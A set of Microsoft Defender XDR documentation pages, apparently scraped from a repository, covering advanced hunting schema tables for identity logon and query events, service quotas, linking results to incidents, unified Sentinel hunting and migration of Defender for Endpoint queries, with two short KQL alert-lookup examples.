-<a name="mdi-only"></a>* Available only for tenants with Microsoft Defender for Identity, Microsoft Defender for Cloud Apps or Microsoft Defender for Endpoint P2 licensing.
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Identitylogonevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-identitylogonevents-table.md
- Title: IdentityLogonEvents table in the advanced hunting schema
-description: Learn about authentication events recorded by Active Directory in the IdentityLogonEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/12/2024--
-# IdentityLogonEvents
--
-**Applies to:**
-- Microsoft Defender XDR-
-The `IdentityLogonEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about authentication activities made through your on-premises Active Directory captured by Microsoft Defender for Identity and authentication activities related to Microsoft online services captured by Microsoft Defender for Cloud Apps. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-> [!NOTE]
-> This table covers Microsoft Entra logon activities tracked by Defender for Cloud Apps, specifically interactive sign-ins and authentication activities using ActiveSync and other legacy protocols. Non-interactive logons that are not available in this table can be viewed in the Microsoft Entra audit log. [Learn more about connecting Defender for Cloud Apps to Microsoft 365](/cloud-app-security/connect-office-365-to-microsoft-cloud-app-security)
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details |
-| `Application` | `string` | Application that performed the recorded action |
-| `LogonType` | `string` | Type of logon session. For more information, see [Supported logon types](#supported-logon-types). |
-| `Protocol` | `string` | Network protocol used |
-| `FailureReason` | `string` | Information explaining why the recorded action failed |
-| `AccountName` | `string` | User name of the account |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `DeviceType` | `string` | Type of device based on purpose and functionality, such as network device, workstation, server, mobile, gaming console, or printer |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10 and Windows 7. |
-| `IPAddress` | `string` | IP address assigned to the endpoint and used during related network communications |
-| `Port` | `int` | TCP port used during communication |
-| `DestinationDeviceName` | `string` | Name of the device running the server application that processed the recorded action |
-| `DestinationIPAddress` | `string` | IP address of the device running the server application that processed the recorded action |
-| `DestinationPort` | `int` | Destination port of related network communications |
-| `TargetDeviceName` | `string` | Fully qualified domain name (FQDN) of the device that the recorded action was applied to |
-| `TargetAccountDisplayName` | `string` | Display name of the account that the recorded action was applied to |
-| `Location` | `string` | City, country/region, or other geographic location associated with the event |
-| `Isp` | `string` | Internet service provider (ISP) associated with the endpoint IP address |
-| `ReportId` | `string` | Unique identifier for the event |
-| `AdditionalFields` | `dynamic` | Additional information about the entity or event |
-
-## Supported logon types
-
-The following table lists the supported values for the `LogonType` column.
-
-|Logon type|Monitored activity|Description|
-||||
-|Logon type 2|Credentials Validation|Domain-account authentication event using the NTLM and Kerberos authentication methods.|
-|Logon type 2|Interactive Logon|User gained network access by entering a username and password (authentication method Kerberos or NTLM).|
-|Logon type 2|Interactive Logon with Certificate|User gained network access by using a certificate.|
-|Logon type 2|VPN Connection|User connected by VPN - Authentication using RADIUS protocol.|
-|Logon type 3|Resource Access|User accessed a resource using Kerberos or NTLM authentication.|
-|Logon type 3|Delegated Resource Access|User accessed a resource using Kerberos delegation.|
-|Logon type 8|LDAP Cleartext|User authenticated using LDAP with a clear-text password (Simple authentication).|
-|Logon type 10|Remote Desktop|User performed an RDP session to a remote computer using Kerberos authentication.|
-||Failed Logon|Domain-account failed authentication attempt (via NTLM and Kerberos) due to the following: account was disabled/expired/locked/used an untrusted certificate or due to invalid logon hours/old password/expired password/wrong password.|
-||Failed Logon with Certificate|Domain-account failed authentication attempt (via Kerberos) due to the following: account was disabled/expired/locked/used an untrusted certificate or due to invalid logon hours/old password/expired password/wrong password.|
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Identityqueryevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-identityqueryevents-table.md
- Title: IdentityQueryEvents table in the advanced hunting schema
-description: Learn about Active Directory query events in the IdentityQueryEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# IdentityQueryEvents
---
-**Applies to:**
-- Microsoft Defender XDR-
-The `IdentityQueryEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about queries performed against Active Directory objects, such as users, groups, devices, and domains. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details |
-| `Application` | `string` | Application that performed the recorded action |
-| `QueryType` | `string` | Type of query, such as QueryGroup, QueryUser, or EnumerateUsers |
-| `QueryTarget` | `string` | Name of user, group, device, domain, or any other entity type being queried |
-| `Query` | `string` | String used to run the query |
-| `Protocol` | `string` | Protocol used during the communication |
-| `AccountName` | `string` | User name of the account |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `IPAddress` | `string` | IP address assigned to the endpoint and used during related network communications |
-| `Port` | `int` | TCP port used during communication |
-| `DestinationDeviceName` | `string` | Name of the device running the server application that processed the recorded action |
-| `DestinationIPAddress` | `string` | IP address of the device running the server application that processed the recorded action |
-| `DestinationPort` | `int` | Destination port of related network communications |
-| `TargetDeviceName` | `string` | Fully qualified domain name (FQDN) of the device that the recorded action was applied to |
-| `TargetAccountUpn` | `string` | User principal name (UPN) of the account that the recorded action was applied to |
-| `TargetAccountDisplayName` | `string` | Display name of the account that the recorded action was applied to |
-| `Location` | `string` | City, country/region, or other geographic location associated with the event |
-| `ReportId` | `string` | Unique identifier for the event |
-| `AdditionalFields` | `dynamic` | Additional information about the entity or event |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Limits https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-limits.md
- Title: Use the advanced hunting query resource report
-description: Understand various quotas and usage parameters (service limits) that keep the advanced hunting service responsive
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# Use the advanced hunting query resource report
--
-**Applies to:**
-- Microsoft Defender XDR-
-## Understand advanced hunting quotas and usage parameters
-
-To keep the service performant and responsive, advanced hunting sets various quotas and usage parameters (also known as "service limits"). These quotas and parameters apply separately to queries run manually and to queries run using [custom detection rules](custom-detection-rules.md). Customers who run multiple queries regularly should be mindful of these limits and [apply optimization best practices](advanced-hunting-best-practices.md) to minimize disruptions.
-
-Refer to the following table to understand existing quotas and usage parameters.
-
-| Quota or parameter | Size | Refresh cycle | Description |
-|--|--|--|--|
-| Data range | 30 days | Every query | Each query can look up data from up to the past 30 days. |
-| Result set | 30,000 rows | Every query | Each query can return up to 30,000 records. |
-| Timeout | 10 minutes | Every query | Each query can run for up to 10 minutes. If it does not complete within 10 minutes, the service displays an error.
-| CPU resources | Based on tenant size | Every 15 minutes | The [portal displays an error](advanced-hunting-errors.md) whenever a query runs and the tenant has consumed over 10% of allocated resources. Queries are blocked if the tenant has reached 100% until after the next 15-minute cycle. |
-
-> [!NOTE]
-> A separate set of quotas and parameters apply to advanced hunting queries performed through the API. [Read about advanced hunting APIs](./api-advanced-hunting.md)
-
-## View query resources report to find inefficient queries
-
-The query resources report shows your organization's consumption of CPU resources for hunting based on queries that ran in the last 30 days using any of the hunting interfaces.
-This report is useful in identifying the most resource-intensive queries and understanding how to prevent throttling due to excessive use.
-
-### Access the query resources report
-
-The report can be accessed in two ways:
--- In the advanced hunting page, select **Query resources report**:-
- :::image type="content" source="../../media/ah-query-resources/view-query-resources report.png" alt-text="view the query resources report button in the AH portal" lightbox="../../media/ah-query-resources/view-query-resources report.png":::
--- Within the **Reports** page, find the new report entry in the **General** section-
- :::image type="content" source="../../media/ah-query-resources/reports-general-query-resources.png" alt-text="view the query resources report in the Reports section" lightbox="../../media/ah-query-resources/reports-general-query-resources.png":::
-
-All users can access the reports, however, only the Microsoft Entra global admin, Microsoft Entra security admin, and Microsoft Entra security reader roles can see queries done by all users in all interfaces. Any other user can only see:
--- Queries they ran via the portal-- Public API queries they ran themselves and not through the application-- Custom detections they created-
-### Query resource report contents
-
-By default, the report table displays queries from the last day, and is sorted by Resource usage, to help you easily identify which queries consumed the highest amount of CPU resources.
-
-The query resources report contains all queries that ran, including detailed resource information per query:
--- **Time** ΓÇô when the query was run-- **Interface** ΓÇô whether the query ran in the portal, in custom detections, or via API query-- **User/App** ΓÇô the user or app that ran the query-- **Resource usage** ΓÇô an indicator of the amount of CPU resources a query consumed (can be Low, Medium, or High, where High means the query used a large amount of CPU resources and should be improved to be more efficient)-- **State** ΓÇô whether the query was completed, failed, or was throttled-- **Query time** ΓÇô how long it took to run the query-- **Time range** ΓÇô the time range used in the query-
-> [!TIP]
-> If the query state is **Failed**, you can hover the field to view the reason for the query failure.
--
-### Find resource-heavy queries
-
-Queries with high resource usage or a long query time can probably be optimized to prevent throttling via this interface.
-
-The graph displays resource usage over time per interface. You can easily identify excessive usage and click the spikes in the graph to filter the table accordingly. Once you select an entry in the graph, the table is filtered to that specific date.
-
-You can identify the queries that used the most resources on that day and take action to improve them ΓÇô by [applying query best practices](advanced-hunting-best-practices.md) or educating the user who ran the query or created the rule to take query efficiency and resources into consideration. For guided mode, the user needs to [switch to advanced mode](advanced-hunting-query-builder-details.md#switch-to-advanced-mode-after-building-a-query) to edit the query.
-
-The graph supports two views:
--- Average use per day ΓÇô the average use of resources per day-- Highest use per day ΓÇô the highest actual use of resources per day-
-![Two view modes for query resources report](../../media/ah-query-resources/resource-usage-over-time.png)
-
-This means that, for instance, if on a specific day you ran two queries, one used 50% of your resources and one used 100%, the average daily use value would show 75%, while the top daily use would show 100%.
-
-## Related topics
--- [Advanced hunting best practices](advanced-hunting-best-practices.md)-- [Handle advanced hunting errors](advanced-hunting-errors.md)-- [Advanced hunting overview](advanced-hunting-overview.md)
security Advanced Hunting Link To Incident https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-link-to-incident.md
- Title: Link query results to an incident
-description: Link query results to an incident
--
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier1
- Previously updated : 02/25/2024--
-# Link query results to an incident
---
-**Applies to:**
-- Microsoft Defender XDR-
-You can use the link to incident feature to add advanced hunting query results to a new or existing incident under investigation. This feature helps you easily capture records from advanced hunting activities, which enables you to create a richer timeline or context of events regarding an incident.
-
-## Link results to new or existing incidents
-
-1. In the advanced hunting query page, first enter your query in the query field provided then select **Run query** to get your results.
-
- :::image type="content" source="../../media/link-to-incident-1.png" alt-text="The Query page in the Microsoft Defender portal" lightbox="../../media/link-to-incident-1.png":::
-
-2. In the Results page, select the events or records that are related to a new or current investigation you're working on, then select **Link to incident**.
-
- :::image type="content" source="../../media/link-to-incident-1b.png" alt-text="The Link to incident option of the Results tab in the Microsoft Defender portal" lightbox="../../media/link-to-incident-1b.png":::
-
-3. Find the **Alert details** section in the Link to incident pane, then select **Create new incident** to convert the events to alerts and group them to a new incident:
-
- :::image type="content" source="../../media/link-to-incident-3-create-new.png" alt-text="The Alert details section in the Link to incident pane in the Microsoft Defender portal" lightbox="../../media/link-to-incident-3-create-new.png":::
-
- Or select **Link to an existing incident** to add the selected records to an existing one. Choose the related incident from the dropdown list of existing incidents. You can also enter the first few characters of the incident name or ID to find the existing incident.
-
- :::image type="content" source="../../media/link-to-incident-3-link-to-existing.png" alt-text="The Alert details section in the Microsoft Defender portal" lightbox="../../media/link-to-incident-3-link-to-existing.png":::
-
-4. For either selection, provide the following details, then select **Next**:
- - **Alert title** - provide a descriptive title for the results that your incident responders can understand. This descriptive title becomes the alert title.
- - **Severity** - Choose the severity applicable to the group of alerts.
- - **Category** - Choose the appropriate threat category for the alerts.
- - **Description** - Give a helpful description for the grouped alerts.
- - **Recommended actions** - Provide remediation actions.
-
-5. In the **Impacted entities** section, select the main affected or impacted entity. Only the applicable entities based on the query results appear in this section. In our example, we used a query to find events related to a possible email exfiltration incident, therefore the Sender is the impacted entity. If there are four different senders, for instance, four alerts are created and linked to the chosen incident.
-
- :::image type="content" source="../../media/link-to-incident-4-impacted-entities.png" alt-text="The impacted entity in the Link to incident section in the Microsoft Defender portal" lightbox="../../media/link-to-incident-4-impacted-entities.png":::
-
-1. Select **Next**.
-1. Review the details you've provided in the **Summary** section.
- :::image type="content" source="../../media/link-to-incident-5-summary.png" alt-text="The results page in the Link to incident section in the Microsoft Defender portal" lightbox="../../media/link-to-incident-5-summary.png":::
-
-1. Select **Done**.
-
-## View linked records in the incident
-
-You can select the incident name to view the incident that the events are linked to.
-
-In our example, the four alerts, representing the four selected events, were linked successfully to a new incident.
-
-In each of the alert pages, you can find the complete information on the event or events in timeline view (if available) and query results view.
-
-You can also select the event to open the **Inspect record** pane.
-
-## Filter for events added using advanced hunting
-You can view which alerts were generated from advanced hunting by filtering the Incidents queue and Alerts queue by **Manual** detection source.
-
security Advanced Hunting Microsoft Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-microsoft-defender.md
- Title: Advanced hunting in Microsoft Defender
-description: Advanced hunting in the portal unifying Defender XDR and Sentinel data
--
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier1
- - usx-security
-
-appliesto:
- - Microsoft Defender XDR
- - Microsoft Sentinel in the Microsoft Defender portal
Previously updated : 04/12/2024--
-# Advanced hunting in the Microsoft Defender portal
-
-Advanced hunting in the unified portal allows you to view and query all data from Microsoft Defender XDR. This includes data from various Microsoft security services and Microsoft Sentinel, which includes data from non-Microsoft products, in a single platform. You can also access and use all your existing Microsoft Sentinel workspace content, including queries and functions.
-
-Querying from a single portal across different data sets makes hunting more efficient and removes the need for context-switching.
--
-## How to access
-
-### Required roles and permissions
-To query across Microsoft Sentinel and Microsoft Defender XDR data in the unified advanced hunting page, you must have access to Microsoft Defender XDR advanced hunting (see [Required roles and permissions](custom-roles.md#required-roles-and-permissions)) and at least Microsoft Sentinel Reader (see [Microsoft Sentinel-specific roles](/azure/sentinel/roles#microsoft-sentinel-specific-roles)).
-
-In the unified portal, you can query any data in any workload that you can currently access based on the roles and permissions you have.
-
-### Connect a workspace
-
-In Microsoft Defender, you can connect workspaces by selecting **Connect a workspace** in the top banner. This button appears if you're eligible to onboard a Microsoft Sentinel workspace onto the unified Microsoft Defender portal. Follow the steps in: **[Onboarding a workspace](https://aka.ms/onboard-microsoft-sentinel)**.
-
-After connecting your Microsoft Sentinel workspace and Microsoft Defender XDR advanced hunting data, you can start querying Microsoft Sentinel data from the advanced hunting page. For an overview of advanced hunting features, read [Proactively hunt for threats with advanced hunting](advanced-hunting-overview.md).
-
-## What to expect for Defender XDR tables streamed to Microsoft Sentinel
-- **Use tables with longer data retention period in queries** ΓÇô Advanced hunting follows the maximum data retention period configured for the Defender XDR tables (see [Understand quotas](advanced-hunting-limits.md#understand-advanced-hunting-quotas-and-usage-parameters)). If you stream Defender XDR tables to Microsoft Sentinel and have a data retention period longer than 30 days for said tables, you can query for the longer period in advanced hunting.-- **Use Kusto operators you've used in Microsoft Sentinel** ΓÇô In general, queries from Microsoft Sentinel work in advanced hunting, including queries that use the `adx()` operator. There might be cases where IntelliSense warns you that the operators in your query don't match the schema, however, you can still run the query and it should still be executed successfully.-- **Use the time filter dropdown instead of setting the time span in the query** ΓÇô If you're filtering ingestion of Defender XDR tables to Sentinel instead of streaming the tables as is, don't filter the time in the query as this might generate incomplete results. If you set the time in the query, the streamed, filtered data from Sentinel is used because it usually has the longer data retention period. If you would like to make sure you're querying all Defender XDR data for up to 30 days, use the time filter dropdown provided in the query editor instead. -- **View `SourceSystem` and `MachineGroup` columns for Defender XDR data that have been streamed from Microsoft Sentinel** ΓÇô Since the columns `SourceSystem` and `MachineGroup` are added to Defender XDR tables once they're streamed to Microsoft Sentinel, they also appear in results in advanced hunting in Defender. However, they remain blank for Defender XDR tables that weren't streamed (tables that follow the default 30-day data retention period).-
-> [!NOTE]
-> Using the unified portal, where you can query Microsoft Sentinel data after connecting a Microsoft Sentinel workspace, does not automatically mean you can also query Defender XDR data while in Microsoft Sentinel. Raw data ingestion of Defender XDR should still be configured in Microsoft Sentinel for this to happen.
-
-## Where to find your Microsoft Sentinel data
-You can use advanced hunting KQL (Kusto Query Language) queries to hunt through Microsoft Defender XDR and Microsoft Sentinel data.
-
-When you open the advanced hunting page for the first time after connecting a workspace, you can find many of that workspace's tables organized by solution after the Microsoft Defender XDR tables under the **Schema** tab.
----
-Likewise, you can find the functions from Microsoft Sentinel in the **Functions** tab, and your shared and sample queries from Microsoft Sentinel can be found in the **Queries** tab inside folders marked **Sentinel**.
-
-## View schema information
-To learn more about a schema table, select the vertical ellipses ( ![kebab icon](../../media/ah-kebab.png) ) to the right of any schema table name under the **Schema** tab, then select **View schema**.
-
-In the unified portal, in addition to viewing the schema column names and descriptions, you can also view:
--- Sample data ΓÇô select **See preview data**, which loads a simple query like `TableName | take 5`-- **Schema type** ΓÇô whether the table supports full query capabilities (advanced table) or not (basic logs table)-- **Data retention period** ΓÇô how long the data is set to be kept-- **Tags** ΓÇô available for Sentinel data tables--
-## Use functions
-
-To use a function from Microsoft Sentinel, go to the **Functions** tab and scroll until you find the function that you want. Double-click the function name to insert the function in the query editor.
-
-You can also select the vertical ellipses ( ![kebab icon](../../media/ah-kebab.png) ) to the right of the function and select **Insert to query** to insert the function into a query in the query editor.
-
-Other options include:
-- **View details** ΓÇô opens the function side pane containing its details-- **Load function code** ΓÇô opens a new tab containing the function code-
-For editable functions, more options are available when you select the vertical ellipses:
-- **Edit details** ΓÇô opens the function side pane to allow you to edit details about the function (except folder names for Sentinel functions)-- **Delete** ΓÇô deletes the function--
-## Use saved queries
-
-To use a saved query from Microsoft Sentinel, go to the **Queries** tab and scroll until you find the query that you want. Double-click the query name to load the query in the query editor. For more options, select the vertical ellipses ( ![kebab icon](../../media/ah-kebab.png) ) to the right of the query. From here, you can perform the following actions:
--- **Run query** ΓÇô loads the query in the query editor and runs it automatically-- **Open in query editor** ΓÇô loads the query in the query editor-- **View details** ΓÇô opens the query details side pane where you can inspect the query, run the query, or open the query in the editor-
- :::image type="content" source="../../media/advanced-hunting-unified-view-details.png" alt-text="Screenshot of the options available in saved queries in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-unified-view-details.png":::
--
-For editable queries, more options are available:
--- **Edit details** ΓÇô opens the query details side pane with the option to edit the details like description (if applicable) and the query itself; only the folder names (location) of Microsoft Sentinel queries can't be edited-- **Delete** ΓÇô deletes the query-- **Rename** ΓÇô allows you to modify the query name-
-## Create custom analytics and detection rules
-
-To help discover threats and anomalous behaviors in your environment, you can create custom detection policies.
-
-For analytics rules that apply to data ingested through the connected Microsoft Sentinel workspace, select **Manage rules > Create analytics rule**.
--
-The **Analytics rule wizard** appears. Fill up the required details as described in [Analytics rule wizardΓÇöGeneral tab](/azure/sentinel/detect-threats-custom#analytics-rule-wizardgeneral-tab).
-
-For custom detection rules that apply to Microsoft Defender XDR data, select **Manage rules > Create custom detection**. Read [Create and manage custom detection rules](custom-detection-rules.md) for more information.
-
-## Explore results
-
-Results of queries that were run appear in the **Results** tab. You can export the results to a CSV file by selecting **Export**.
--
-You can also explore the results in-line with the following features:
--- Expand a result by selecting the dropdown arrow at the left of each result-- Where applicable, expand details for results that are in JSON or array format by selecting the dropdown arrow at the left of applicable result row for added readability-- Open the side pane to see a record's details (concurrent with expanded rows)-
-You can also right-click on any result value in a row so that you can use it to:
-- Add more filters to the existing query-- Copy the value for use in further investigation-- Update the query to extend a JSON field to a new column-
-For Microsoft Defender XDR data, you can take further action by selecting the checkboxes to the left of each result row. Select **Link to incident** to link the selected results to an incident (read [Link query results to an incident](advanced-hunting-link-to-incident.md)) or **Take actions** to open the Take actions wizard (read [Take action on advanced hunting query results](advanced-hunting-take-action.md)).
-
-## Known issues
--- The `IdentityInfo table` from [Microsoft Sentinel](/azure/sentinel/ueba-reference#identityinfo-table) isn't available, as the `IdentityInfo` table remains as is in Defender XDR. Microsoft Sentinel features like analytics rules that query this table aren't impacted as they're querying the Log Analytics workspace directly.-- The Microsoft Sentinel `SecurityAlert` table is replaced by `AlertInfo` and `AlertEvidence` tables, which both contain all the data on alerts. While SecurityAlert isn't available in the schema tab, you can still use it in queries using the advanced hunting editor. This provision is made so as not to break existing queries from Microsoft Sentinel that use this table. -- Guided hunting mode is supported for Defender XDR data only.-- Custom detections, links to incidents, and take actions capabilities are supported for Defender XDR data only.-- Bookmarks aren't supported in the advanced hunting experience. They're supported in the **Microsoft Sentinel > Threat management > Hunting** feature.-- If you're streaming Defender XDR tables to Log Analytics, there might be a difference between the`Timestamp` and `TimeGenerated` columns. In case the data arrives to Log Analytics after 48 hours, it's being overridden upon ingestion to `now()`. Therefore, to get the actual time the event happened, we recommend relying on the `Timestamp` column.-- The Microsoft Graph API for running an advanced hunting query doesn't support querying data from Microsoft Sentinel yet. ---
security Advanced Hunting Migrate From Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-migrate-from-mde.md
- Title: Migrate advanced hunting queries from Microsoft Defender for Endpoint
-description: Learn how to adjust your Microsoft Defender for Endpoint queries so you can use them in Microsoft Defender XDR
--
- - NOCSH
----
- - m365-security
- - tier2
-- Previously updated : 02/17/2024--
-# Migrate advanced hunting queries from Microsoft Defender for Endpoint
--
-**Applies to:**
-- Microsoft Defender XDR-
-Move your advanced hunting workflows from Microsoft Defender for Endpoint to proactively hunt for threats using a broader set of data. In Microsoft Defender XDR, you get access to data from other Microsoft 365 security solutions, including:
--- Microsoft Defender for Endpoint-- Microsoft Defender for Office 365-- Microsoft Defender for Cloud Apps-- Microsoft Defender for Identity-
-> [!NOTE]
-> Most Microsoft Defender for Endpoint customers can [use Microsoft Defender XDR without additional licenses](prerequisites.md#licensing-requirements). To start transitioning your advanced hunting workflows from Defender for Endpoint, [turn on Microsoft Defender XDR](m365d-enable.md).
-
-You can transition without affecting your existing Defender for Endpoint workflows. Saved queries remain intact, and custom detection rules continue to run and generate alerts. They will, however, be visible in Microsoft Defender XDR.
-
-<a name='schema-tables-in-microsoft-365-defender-only'></a>
-
-## Schema tables in Microsoft Defender XDR only
-
-The [Microsoft Defender XDR advanced hunting schema](advanced-hunting-schema-tables.md) provides additional tables containing data from various Microsoft 365 security solutions. The following tables are available only in Microsoft Defender XDR:
-
-| Table name | Description |
-||-|
-| [AlertEvidence](advanced-hunting-alertevidence-table.md) | Files, IP addresses, URLs, users, or devices associated with alerts |
-| [AlertInfo](advanced-hunting-alertinfo-table.md) | Alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Cloud Apps, and Microsoft Defender for Identity, including severity information and threat categories |
-| [EmailAttachmentInfo](advanced-hunting-emailattachmentinfo-table.md) | Information about files attached to emails |
-| [EmailEvents](advanced-hunting-emailevents-table.md) | Microsoft 365 email events, including email delivery and blocking events |
-| [EmailPostDeliveryEvents](advanced-hunting-emailpostdeliveryevents-table.md) | Security events that occur post-delivery, after Microsoft 365 has delivered the emails to the recipient mailbox |
-| [EmailUrlInfo](advanced-hunting-emailurlinfo-table.md) | Information about URLs on emails |
-| [IdentityDirectoryEvents](advanced-hunting-identitydirectoryevents-table.md) | Events involving an on-premises domain controller running Active Directory (AD). This table covers a range of identity-related events and system events on the domain controller. |
-| [IdentityInfo](advanced-hunting-identityinfo-table.md) | Account information from various sources, including Microsoft Entra ID |
-| [IdentityLogonEvents](advanced-hunting-identitylogonevents-table.md) | Authentication events on Active Directory and Microsoft online services |
-| [IdentityQueryEvents](advanced-hunting-identityqueryevents-table.md) | Queries for Active Directory objects, such as users, groups, devices, and domains |
-
-> [!IMPORTANT]
-> Queries and custom detections which use schema tables that are only available in Microsoft Defender XDR can only be viewed in Microsoft Defender XDR.
-
-## Map DeviceAlertEvents table
-
-The `AlertInfo` and `AlertEvidence` tables replace the `DeviceAlertEvents` table in the Microsoft Defender for Endpoint schema. In addition to data about device alerts, these two tables include data about alerts for identities, apps, and emails.
-
-Use the following table to check how `DeviceAlertEvents` columns map to columns in the `AlertInfo` and `AlertEvidence` tables.
-
-> [!TIP]
-> In addition to the columns in the following table, the `AlertEvidence` table includes many other columns that provide a more holistic picture of alerts from various sources. [See all AlertEvidence columns](advanced-hunting-alertevidence-table.md)
-
-| DeviceAlertEvents column | Where to find the same data in Microsoft Defender XDR |
-|-|--|-|-|
-| `AlertId` | `AlertInfo` and `AlertEvidence` tables |
-| `Timestamp` | `AlertInfo` and `AlertEvidence` tables |
-| `DeviceId` | `AlertEvidence` table |
-| `DeviceName` | `AlertEvidence` table |
-| `Severity` | `AlertInfo` table |
-| `Category` | `AlertInfo` table |
-| `Title` | `AlertInfo` table |
-| `FileName` | `AlertEvidence` table |
-| `SHA1` | `AlertEvidence` table |
-| `RemoteUrl` | `AlertEvidence` table |
-| `RemoteIP` | `AlertEvidence` table |
-| `AttackTechniques` | `AlertInfo` table |
-| `ReportId` | This column is typically used in Microsoft Defender for Endpoint to locate related records in other tables. In Microsoft Defender XDR, you can get related data directly from the `AlertEvidence` table. |
-| `Table` | This column is typically used in Microsoft Defender for Endpoint for additional event information in other tables. In Microsoft Defender XDR, you can get related data directly from the `AlertEvidence` table. |
-
-## Adjust existing Microsoft Defender for Endpoint queries
-
-Microsoft Defender for Endpoint queries will work as-is unless they reference the `DeviceAlertEvents` table. To use these queries in Microsoft Defender XDR, apply these changes:
--- Replace `DeviceAlertEvents` with `AlertInfo`.-- Join the `AlertInfo` and the `AlertEvidence` tables on `AlertId` to get equivalent data.-
-### Original query
-
-The following query uses `DeviceAlertEvents` in Microsoft Defender for Endpoint to get the alerts that involve _powershell.exe_:
-
-```kusto
-DeviceAlertEvents
-| where Timestamp > ago(7d)
-| where AttackTechniques has "PowerShell (T1086)" and FileName == "powershell.exe"
-```
-
-### Modified query
-
-The following query has been adjusted for use in Microsoft Defender XDR. Instead of checking the file name directly from `DeviceAlertEvents`, it joins `AlertEvidence` and checks for the file name in that table.
-
-```kusto
-AlertInfo
-| where Timestamp > ago(7d)
-| where AttackTechniques has "PowerShell (T1086)"
-| join AlertEvidence on AlertId
-| where FileName == "powershell.exe"
-```
-
-## Migrate custom detection rules
-
-When Microsoft Defender for Endpoint rules are edited on Microsoft Defender XDR, they continue to function as before if the resulting query looks at device tables only.
-
-For example, alerts generated by custom detection rules that query only device tables will continue to be delivered to your SIEM and generate email notifications, depending on how you've configured these in Microsoft Defender for Endpoint. Any existing suppression rules in Defender for Endpoint will also continue to apply.
-
-Once you edit a Defender for Endpoint rule so that it queries identity and email tables, which are only available in Microsoft Defender XDR, the rule is automatically moved to Microsoft Defender XDR.
-
-Alerts generated by the migrated rule:
--- Are no longer visible in the Defender for Endpoint portal (Microsoft Defender Security Center)-- Stop being delivered to your SIEM or generate email notifications. To work around this change, configure notifications through Microsoft Defender XDR to get the alerts. You can use the [Microsoft Defender XDR API](api-incident.md) to receive notifications for customer detection alerts or related incidents.-- Won't be suppressed by Microsoft Defender for Endpoint suppression rules. To prevent alerts from being generated for certain users, devices, or mailboxes, modify the corresponding queries to exclude those entities explicitly.-
-If you edit a rule this way, you will be prompted for confirmation before such changes are applied.
-
-New alerts generated by custom detection rules in Microsoft Defender XDR are displayed in an alert page that provides the following information:
